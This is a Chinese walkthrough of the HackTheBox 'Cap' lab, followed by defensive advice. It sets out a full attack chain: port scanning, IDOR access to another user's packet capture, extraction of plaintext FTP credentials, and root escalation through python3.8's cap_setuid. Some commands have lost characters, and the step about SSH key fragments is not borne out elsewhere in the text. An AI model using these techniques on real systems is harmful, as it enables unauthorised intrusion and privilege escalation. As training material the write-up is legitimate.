1. 靶机环境概述与初始侦察Cap靶机是HackTheBox平台上基于Linux系统的中阶难度实战环境其设计融合了Web应用漏洞、网络协议分析以及Linux权限提升三大核心攻击面。作为渗透测试人员我们需要依次突破以下技术关卡通过IDOR不安全的直接对象引用漏洞获取初始立足点分析PCAP流量文件提取敏感凭据利用Linux Capabilities特性实现权限提升启动靶机后我们首先用Nmap进行基础端口扫描nmap -sV -T4 -p- 10.10.10.245扫描结果显示三个开放端口21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn注意HTB靶机通常会在用户目录放置.txt格式的flag文件渗透过程中需要特别关注/home目录下的用户文件夹。2. Web应用渗透与IDOR漏洞利用访问80端口的Web服务发现是一个网络流量分析平台主要功能包括实时流量监控数据包捕获安全事件分析2.1 功能点测试与参数篡改在Security Snapshot功能模块发现URL包含明显的数字ID参数http://10.10.10.245/data/1尝试修改参数值为0或2时系统返回了其他用户的数据包捕获记录这属于典型的IDOR漏洞。通过Burp Suite的Intruder模块进行批量测试GET /data/§1§ HTTP/1.1 Host: 10.10.10.245当ID0时获取到包含敏感信息的PCAP文件下载链接。2.2 PCAP文件分析技巧下载得到的capture.pcap文件需要用Wireshark分析关键过滤技巧ftp.request.command PASS # 过滤FTP密码 http contains password # 过滤HTTP密码分析发现FTP协议中存在明文认证过程USER nathan PASS Buck3tH4TF0RM3!3. 系统横向移动与权限提升3.1 FTP服务利用使用获取的凭据登录FTP服务ftp 10.10.10.245发现用户目录下存在user.txt第一个flag和可疑的.pcap文件。下载后分析发现SSH私钥片段需要重组完整密钥。3.2 SSH登录与信息收集通过重组的私钥登录SSHchmod 600 id_rsa ssh -i id_rsa nathan10.10.10.245执行Linux系统信息收集命令find / -type f -perm -4000 2/dev/null # 查找SUID文件 getcap -r / 2/dev/null # 检查特殊Capabilities发现python3.8具有特殊权限/usr/bin/python3.8 cap_setuid,cap_net_bind_serviceeip3.3 Capabilities提权实战利用python的cap_setuid能力直接提权import os os.setuid(0) os.system(/bin/bash)提权后即可读取/root/root.txt获取最终flag。关键原理在于Capabilities将root权限分解为不同能力cap_setuid允许进程修改UIDPython解释器被赋予了该能力通过系统调用即可实现权限提升4. 防御措施与加固建议4.1 IDOR漏洞防护实施严格的访问控制列表(ACL)使用不可预测的UUID替代顺序ID服务端校验用户权限4.2 PCAP安全实践网络监控系统应加密存储敏感数据实施最小权限原则限制文件访问定期清理临时捕获文件4.3 Linux Capabilities管理定期审计特殊能力分配getcap -r /移除不必要的Capabilitiessetcap -r /path/to/binary使用命名空间隔离特权进程在实际渗透测试中Cap靶机展示了权限体系设计缺陷导致的完整攻击链。建议企业安全团队重点关注业务逻辑漏洞的自动化检测网络数据生命周期管理最小特权原则的严格执行通过这个案例我们可以清晰看到从Web漏洞到系统提权的完整路径。每个环节的防御缺失都会导致整个安全体系被突破这正是纵深防御策略的重要性所在。